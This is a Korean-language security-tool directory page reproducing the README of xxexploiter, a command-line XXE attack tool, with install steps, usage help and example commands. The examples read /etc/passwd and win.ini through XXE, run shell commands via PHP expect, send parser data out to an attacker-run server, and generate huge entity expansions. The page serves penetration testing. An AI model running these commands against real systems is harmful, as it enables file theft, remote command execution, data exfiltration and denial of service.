Skip to content
KitploitKITPLOIT
도구익스플로잇블로그
Log in
제출
도구익스플로잇블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
xxexploiter — XXE 취약점 공격 도구 | Kitploit
도구/GitHubGitHub/luisfontes19/xxexploiter
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationFuzzing
GitHubluisfontes19/xxexploiter

xxexploiter

XXE 취약점 공격 도구

저장소 보기
61570174년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

XXExploiter

Build codecov Known Vulnerabilities License: MIT

XXExploiter

XML 페이로드를 생성하고, 필요한 DTD를 제공하거나 데이터 유출을 수행하기 위해 자동으로 서버를 시작합니다.

설치

# node와 npm이 아직 없다면 먼저 설치하세요
npm install -g xxexploiter

소스에서 빌드 및 실행

이것은 TypeScript로 작성된 간단한 Node 애플리케이션입니다. 따라서 다른 앱과 동일한 방식으로 빌드할 수 있습니다. (node와 npm을 먼저 설치하세요, 아직 없다면)

npm install
npm run build
# 'npm build'가 성공하려면 npm install typescript -g가 필요할 수 있습니다

앱을 실행하는 방법은 세 가지가 있습니다:

npm start [args]
node dist/index.js [args]
npm link # 이제 xxexploiter라고만 입력하면 됩니다

또는 시스템에 설치할 수도 있습니다:

npm link

사용법

Usage: xxexploiter [command] [options]

Commands:
  xxexploiter file [file_to_read]  Use XXE to do a request
  xxexploiter request [URL]        Use XXE to do a request
  xxexploiter expect [command]     Use XXE to execute a command through PHP's expect
  xxexploiter xee [expantions]     Generate a huge content by resolving entities

Fuzzing Specific Options
  -w, --wordlist        Path to a wordlist to be used with the fuzz command. Use {{FUZZ}} placeholder in the command arg
                        for the magic.
  -y, --success-string  String to search for a success response in the requests. Not usefull for blind attacks
  -n, --error-string    String to search for an error response in the request. Not usefull for blind attacks

Options:
  --version             Show version number                                                                    [boolean]
  -s, --server          Server address for OOB and DTD
  -p, --port            Server port for OOB and DTDs. Default: 7777
  -t, --template        path to an XML template where to inject payload
  -m, --mode            Extraction Mode: xml, oob, cdata. Default: xml
  -e, --encode          Extraction Encoding: none, phpbase64. Default: none
  -o, --output          Output for the XML payload file. Default is to console
  -x                    Use a request to automatically send the xml file
  -X, --request-output  Output the response from -x option. If not defined goes to stdout
  --verbose             Enable some messages help for understanding whats happening
  --doctype             Specify the name of the doctype to be injected. Default is xxexploiter
  -h, --help            Show help                                                                              [boolean]

Examples:
  xxexploiter expect ls
  xxexploiter -s 127.0.0.1 expect ls -e phpbase64 -m oob -o output.xml
  xxexploiter -s 127.0.0.1 file /c/windows/win.ini -t xmltemplate.xml -m oob
  xxexploiter xee 900000000 -o output.xml
  xxexploiter file /etc/passwd -x request.txt -t template.xml
  xxexploiter file /root/{FUZZ} -w wordlist.txt -n "not found" -x request.txt

Extra Info:
  - When using the xml or cdata modes, add the placeholder '{{XXE}}' in the field where you want the entity content to
  be injected
  - When specifiying file paths for windows use forward slash.
  - OOB: Out Of Bound: You can use this option to send the data processed by the xml parser, to your local webserver.
  Usefull with blind attacks
  - When using XML mode, it may break the XML parsing if XML reserved characters are loaded, so you may want to use
  cdata
  - When using the request option, you can specify the placeholder to inject the payload with {{XXE}} or {{XXE_B64}}
  - When fuzzing you can add the {{FUZZ}} keyword in the main command argument.
  - You can specify a string to filter successfull requests when fuzzing, either by supplying an expected error string,
  or an expected success string

예제

간단한 페이로드 생성

asciicast

페이로드를 보내기 위한 요청 자동화

asciicast

자동 요청을 이용한 OOB 추출

asciicast

퍼징

asciicast

참고 사항:

OOB 또는 CDATA 모드를 선택하면 XXExploiter가 포함할 DTD를 생성하고 이를 호스팅할 서버를 시작합니다. 이러한 옵션을 사용할 경우 서버 주소를 설정해야 합니다.

XML 본문에 콘텐츠를 포함할 경우 '<'와 같은 XML 제한 문자로 인해 파싱이 깨질 수 있으므로 CDATA 또는 PHP의 base64encode를 사용하세요.

대부분의 언어는 엔티티 확장 횟수나 확장된 콘텐츠의 총 길이를 제한하므로, 대상과 동일한 조건에서 먼저 자신의 머신에서 XEE를 테스트하세요.

도구 다운로드